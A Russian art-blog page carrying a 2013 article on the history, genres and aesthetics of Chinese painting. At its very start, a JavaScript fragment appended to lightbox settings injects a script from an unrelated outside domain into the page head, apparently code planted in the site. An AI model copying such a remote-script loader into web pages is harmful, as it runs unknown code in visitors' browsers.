, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Китайская живопись

Автор: Наталья Юрова | 03 Фев 2013

Китайская живописьЦивилизация Китая - одна из немногих культур, которая зарождалась автономно, и до настоящего времени непрерывно развивается и  процветает.  Культура Китая  очень многообразна, но отлична от других и поэтому уникальна.

Древняя китайская живопись уходит своими корнями в далекий неолит и представляла собой  глиняные сосуды с  рисунками людей, животных (5 тыс.лет до н.э)…  Позже, в «эпоху бронзы» было распространено украшение ритуальных сосудов божественной  символикой и элементами орнамента (3 вв. до н.э.). В «шелковый период» рисунки наносились на погребальный шелк. Это человеческие фигуры, огнедышащие драконы (символ ада) и птицы феникс (символ рая). Еще позже (221 до н.э. - 220 н.э) появилась фресковая живопись, которая украшала дворцы и храмы, и использовалась при захоронениях.

Китайская живопись совершенно отличается от западной живописи. И дело здесь не в применяемых технических средствах, а в совсем непохожим художественном языке. Китайский стиль написания – утонченный, хрупкий, пронизан древней культурой и поэтому в чем-то постоянен. Невозможно отыскать в китайской живописи агрессию и враждебность. Даже если картина (на фреске или сосуде) изображается сцену битвы, то эта битва – не ради убийства, власти или корысти, а ради справедливости или защиты соотечественников. Агрессия ради агрессии – это чуждо китайской культуре.

Китайская живописьПротиворечивость западной живописи угнетает китайских почитателей живописи, так как производит впечатление хаоса, как в используемых красках, так и в вызываемых эмоциях…

Живопись Китая очень схожа с китайской музыкой: такая же мелодичная,  плавная, утонченная…  Она никогда не строилась на математических теориях, как современная абстракция, не стремилась изображать натуру, как это делало реалистическое искусство, не уделяла  много внимания "Я", как экспрессионисты.

Жанры китайской живописи очень различны. Это анималистические жанры "Растения и насекомые", "Цветы и птицы", бытовые жанры "Люди и предметы", парадный портрет, миниатюра на веерах и других предметах обихода, а также - пейзажная живопись "Горы и воды". Так, в Китае никогда не было такого жанра, как «натюрморт». Для китайцев неподвижные предметы  мертвы, то есть не имеют жизни и развития во времени. Даже если китайцы рисовали фрукты, то всегда - на ветке, а камни были изображены у реки или в траве…

Темы: Изобразительное искусство, о Живописи | Ваш отзыв »

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress